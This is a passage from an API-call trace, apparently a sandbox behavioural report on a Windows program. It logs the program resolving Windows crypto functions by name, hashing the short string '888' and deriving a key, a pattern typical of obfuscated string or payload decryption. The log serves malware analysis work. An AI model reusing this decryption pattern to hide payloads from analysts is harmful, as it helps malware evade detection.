returned 1 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0150.988] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0150.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0150.989] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.989] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.989] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.989] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0150.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0150.989] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.989] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.989] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0150.989] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.989] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0150.989] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0150.989] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0150.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fa0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0150.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0150.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f70e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0150.990] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bed58) returned 1 [0150.990] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.990] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.990] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0150.990] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.990] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0150.990] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.990] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.990] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.990] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.990] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.991] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.991] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0150.991] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.991] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0150.991] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.991] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.991] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0150.991] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0150.991] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.991] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.991] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.991] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0150.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.991] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0150.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.991] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.991] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0150.991] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.991] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0150.992] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.992] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.992] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.992] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.992] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.992] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.997] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0150.997] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.997] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.997] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0150.997] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.997] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0150.997] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.997] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.997] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0150.997] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0150.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.997] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.997] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.997] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.997] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.997] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.997] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.997] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0150.997] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.997] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0150.997] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.997] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0150.998] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0150.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0150.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa4c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0150.998] CryptCreateHash (in: hProv=0x9bed58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0150.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0150.998] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0151.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0151.001] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0151.001] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0151.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71ce8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0151.001] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.002] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.002] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.002] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.002] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.002] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.002] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0151.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa2d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0151.002] CryptHashData (hHash=0x9e2138, pbData=0x2a71c68, dwDataLen=0x3, dwFlags=0x1) returned 1 [0151.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.002] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.002] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.002] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.002] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.002] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.002] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.002] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0151.002] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.002] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0151.002] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.002] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.002] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0151.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa4e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0151.003] CryptDeriveKey (in: hProv=0x9bed58, Algid=0x6601, hBaseData=0x9e2138, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1db8) returned 1 [0151.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.003] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.003] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.003] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0151.003] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.003] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0151.003] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0151.003] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0151.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0151.003] CryptDestroyHash (hHash=0x9e2138) returned 1 [0151.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0151.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0151.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0151.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0151.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0151.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0151.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0151.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0151.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0151.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0151.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0151.004] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0151.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0151.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0151.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0151.004] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0151.004] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.004] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.004] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0151.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 